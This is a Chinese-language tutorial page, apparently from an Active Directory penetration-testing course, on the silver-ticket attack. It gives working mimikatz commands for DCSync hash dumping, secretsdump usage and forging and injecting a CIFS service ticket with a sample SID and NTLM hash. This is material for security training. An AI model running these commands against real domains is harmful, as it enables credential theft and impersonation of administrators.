内网渗透
01基础知识
02域环境的搭建
03工作组权限
04域内权限
05Windows本地认证
06网络认证
07Kerberos协议
08工作组的信息搜集
09域内的信息搜集
10工作组的密码抓取
11域内的密码抓取
12Dcsync原理以及攻击
13RDP密码凭证抓取
14横向移动概述
15IPC$横向移动
16PTH哈希传递
17PTK密钥传递
18PTT票据传递
19PSexec进行横向移动
20SMBexec进行横向移动
21利用WinRM服务进行横向移动
22利用WMI进行横向移动
23用户枚举与喷洒
24用户枚举与喷洒-实验
25Roasting攻击
26Kerberoasting
27黄金票据
28黄金票据-实验
29白银票据
30白银票据-实验
31委派概述
32非约束性委派攻击
33约束性委派攻击
34约束性委派攻击-实验
35基于资源的约束性委派
36基于资源的约束性委派-实验
-
+
首页
29白银票据
## 原理 白银票据就是伪造ST票据,Kerberoasting是破解ST票据中服务用户的hash值 两种之间的区别是: - 白银票据:伪造ST票据使用的是机器用户的hash值 - Kerberoasting:破解ST票据中的服务用户的hash值  > 利用条件 1. 域名 2. 域SID值 3. 目标服务器名 4. 可利用的服务 5. 目标机器用户的NTLM-HASH值 6. 需要伪造的用户名 ## 获取机器用户的hash值 > mimikatz工具 如果有域内管理员账户可以使用dcsync获取 ``` lsadump::dcsync /domain:xbxaq.com /all /csv ```  > secretsdump.exe 通过枚举获取hash值,前提条件拿到了域管理员账号密码 ``` secretsdump.exe 域名/administrator:密码@IP地址 ```  ## 常用伪造服务 > CIFS 在windows主机之间进行网络文件共享是通过使用微软公司自己的CIFS服务实现的。 > 伪造 LDAP 服务权限 可以实现ldap查询,或者执行dcsync > host服务 可以实现计划任务等 ## 制作票据 通过mimikatz制作票据 ``` kerberos::golden /domain:域名 /sid:SID值 /target:目标机器 /service:服务名 /rc4:目标机器上的机器账户NTLM-HASH值 /user:伪造的账户名 </ptt> ``` 注意:如果携带/ptt则会自动注入到内存中,不携带则在本地生成票据。 ``` kerberos::golden /domain:xbxaq.com /sid:S-1-5-21-1445356431-3472965171-1941165345 /target:dc.xbxaq.com /service:CIFS /rc4:5881af9f2f219ae270438137a7f59aaf /user:administrator ```  如果命令后面跟上/ptt ``` kerberos::golden /domain:xbxaq.com /sid:S-1-5-21-1445356431-3472965171-1941165345 /target:dc.xbxaq.com /service:CIFS /rc4:5881af9f2f219ae270438137a7f59aaf /user:administrator /ptt ``` 
毛林
2025年9月7日 11:39
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
PDF文档(打印)
分享
链接
类型
密码
更新密码